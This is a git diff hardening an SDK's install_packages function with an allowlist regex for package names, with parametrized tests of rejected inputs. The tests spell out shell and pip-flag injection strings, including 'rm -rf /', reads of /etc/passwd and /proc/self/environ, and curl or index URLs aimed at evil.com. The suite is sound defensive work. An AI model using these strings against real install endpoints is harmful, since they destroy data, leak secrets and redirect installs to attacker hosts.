diff --git a/src/bedrock_agentcore/tools/code_interpreter_client.py b/src/bedrock_agentcore/tools/code_interpreter_client.py
index 7c2ab4f6..e8c05639 100644
--- a/src/bedrock_agentcore/tools/code_interpreter_client.py
+++ b/src/bedrock_agentcore/tools/code_interpreter_client.py
@@ -6,6 +6,7 @@
 
 import base64
 import logging
+import re
 import uuid
 from contextlib import contextmanager
 from typing import Any, Dict, Generator, List, Optional, Union
@@ -19,6 +20,13 @@
 from .config import Certificate
 
 DEFAULT_IDENTIFIER = "aws.codeinterpreter.v1"
+
+VALID_PACKAGE_NAME = re.compile(
+    r"^[a-zA-Z0-9]([a-zA-Z0-9._-]*[a-zA-Z0-9])?"  # distribution name
+    r"(\[[a-zA-Z0-9._-]+(,[a-zA-Z0-9._-]+)*\])?"  # extras: comma-separated names only
+    r"((==|>=|<=|!=|~=|>|<)[a-zA-Z0-9.*]+)?"  # one version clause; operator required
+    r"\Z"  # unlike "$", does not match before a trailing newline
+)
 DEFAULT_TIMEOUT = 900
 
 
@@ -600,10 +608,10 @@ def install_packages(
         if not packages:
             raise ValueError("At least one package name must be provided")
 
-        # Sanitize package names (basic validation)
+        # Validate package names against allowlist pattern
         for pkg in packages:
-            if any(char in pkg for char in [";", "&", "|", "`", "$"]):
-                raise ValueError(f"Invalid characters in package name: {pkg}")
+            if not VALID_PACKAGE_NAME.match(pkg):
+                raise ValueError(f"Invalid package name: {pkg}")
 
         packages_str = " ".join(packages)
         upgrade_flag = "--upgrade " if upgrade else ""
diff --git a/tests/bedrock_agentcore/tools/test_code_interpreter_client.py b/tests/bedrock_agentcore/tools/test_code_interpreter_client.py
index 9d039b58..e856c3fc 100644
--- a/tests/bedrock_agentcore/tools/test_code_interpreter_client.py
+++ b/tests/bedrock_agentcore/tools/test_code_interpreter_client.py
@@ -984,23 +984,23 @@ def test_install_packages_invalid_characters_error(
         client.session_id = "test-session-id"
 
         # Act & Assert - semicolon
-        with pytest.raises(ValueError, match="Invalid characters in package name"):
+        with pytest.raises(ValueError, match="Invalid package name"):
             client.install_packages(["pandas; rm -rf /"])
 
         # Act & Assert - pipe
-        with pytest.raises(ValueError, match="Invalid characters in package name"):
+        with pytest.raises(ValueError, match="Invalid package name"):
             client.install_packages(["pandas | cat /etc/passwd"])
 
         # Act & Assert - ampersand
-        with pytest.raises(ValueError, match="Invalid characters in package name"):
+        with pytest.raises(ValueError, match="Invalid package name"):
             client.install_packages(["pandas && malicious"])
 
         # Act & Assert - backtick
-        with pytest.raises(ValueError, match="Invalid characters in package name"):
+        with pytest.raises(ValueError, match="Invalid package name"):
             client.install_packages(["pandas`whoami`"])
 
         # Act & Assert - dollar sign
-        with pytest.raises(ValueError, match="Invalid characters in package name"):
+        with pytest.raises(ValueError, match="Invalid package name"):
             client.install_packages(["pandas$HOME"])
 
     @patch("bedrock_agentcore.tools.code_interpreter_client.get_control_plane_endpoint")
@@ -1624,3 +1624,134 @@ def test_create_code_interpreter_without_certificates(
         # Assert — certificates key should NOT be in the call
         call_kwargs = client.control_plane_client.create_code_interpreter.call_args[1]
         assert "certificates" not in call_kwargs
+
+
+@patch("bedrock_agentcore.tools.code_interpreter_client.get_control_plane_endpoint")
+@patch("bedrock_agentcore.tools.code_interpreter_client.get_data_plane_endpoint")
+@patch("bedrock_agentcore.tools.code_interpreter_client.boto3")
+class TestInstallPackagesAllowlist:
+    """Verify install_packages() rejects flag-injection and shell-injection
+    payloads, and still accepts legitimate package specs.
+
+    Tests call install_packages() end-to-end so the full validation path is
+    exercised, including the extras bracket group, which only admits
+    comma-separated extra names.
+    """
+
+    def _client(self, mock_boto3):
+        mock_session = MagicMock()
+        mock_session.client.return_value = MagicMock()
+        mock_boto3.Session.return_value = mock_session
+        client = CodeInterpreter("us-west-2")
+        client.identifier = "test.identifier"
+        client.session_id = "test-session-id"
+        return client
+
+    # ------------------------------------------------------------------ #
+    # Pip flag injection                                                 #
+    # ------------------------------------------------------------------ #
+    @pytest.mark.parametrize(
+        "pkg",
+        [
+            "-r",
+            "-i",
+            "-e",
+            "-f",
+            "-c",
+            "--index-url",
+            "--extra-index-url",
+            "--find-links",
+            "--trusted-host",
+            "--no-deps",
+            "--pre",
+            "--upgrade",
+            "--require-hashes",
+            # flag + value as a single element
+            "--index-url http://evil.com",
+            "--extra-index-url http://evil.com",
+            "-r /etc/passwd",
+            "-r /proc/self/environ",
+        ],
+    )
+    def test_pip_flags_blocked(self, mock_boto3, mock_get_data_endpoint, mock_get_control_endpoint, pkg):
+        client = self._client(mock_boto3)
+        with pytest.raises(ValueError, match="Invalid package name"):
+            client.install_packages([pkg])
+
+    # ------------------------------------------------------------------ #
+    # Shell metacharacter and path injection                             #
+    # ------------------------------------------------------------------ #
+    @pytest.mark.parametrize(
+        "pkg",
+        [
+            "pandas; rm -rf /",
+            "pandas | cat /etc/passwd",
+            "pandas && malicious",
+            "pandas`whoami`",
+            "pandas$HOME",
+            # two packages smuggled as one argument
+            "pandas numpy",
+            # path traversal
+            "/etc/passwd",
+            "../../../etc/passwd",
+            # newline splitting the pip command
+            "pandas\n--extra-index-url http://evil.com",
+            "pandas\nrm -rf /",
+            # lone trailing newline: "$" would match before it, "\Z" does not
+            "pandas\n",
+            # glob character with no version operator in front of it
+            "pandas*",
+        ],
+    )
+    def test_shell_and_path_injection_blocked(self, mock_boto3, mock_get_data_endpoint, mock_get_control_endpoint, pkg):
+        client = self._client(mock_boto3)
+        with pytest.raises(ValueError, match="Invalid package name"):
+            client.install_packages([pkg])
+
+    # ------------------------------------------------------------------ #
+    # Extras bracket injection                                           #
+    # ------------------------------------------------------------------ #
+    @pytest.mark.parametrize(
+        "pkg",
+        [
+            "pandas[; cat /etc/passwd]",
+            "numpy[$(id)]",
+            "scipy[&& curl http://evil.com]",
+            "requests[| whoami]",
+        ],
+    )
+    def test_extras_injection_blocked(self, mock_boto3, mock_get_data_endpoint, mock_get_control_endpoint, pkg):
+        client = self._client(mock_boto3)
+        with pytest.raises(ValueError, match="Invalid package name"):
+            client.install_packages([pkg])
+
+    # ------------------------------------------------------------------ #
+    # Valid package specs — must continue to be accepted                 #
+    # ------------------------------------------------------------------ #
+    @pytest.mark.parametrize(
+        "pkg",
+        [
+            "pandas",
+            "numpy",
+            "scikit-learn",
+            "my_package",
+            "package.name",
+            "A",
+            "Package123",
+            "pandas[excel]",
+            "requests[security]",
+            "requests[security,socks]",
+            "numpy>=1.0",
+            "scipy==1.7.*",
+            "pandas!=2.0",
+            "requests~=2.28",
+            "urllib3<2.0",
+            "numpy>1.0",
+            "pandas[excel]>=1.5",
+        ],
+    )
+    def test_valid_packages_accepted(self, mock_boto3, mock_get_data_endpoint, mock_get_control_endpoint, pkg):
+        client = self._client(mock_boto3)
+        client.data_plane_client.invoke_code_interpreter.return_value = {"stream": []}
+        # Should not raise
+        client.install_packages([pkg])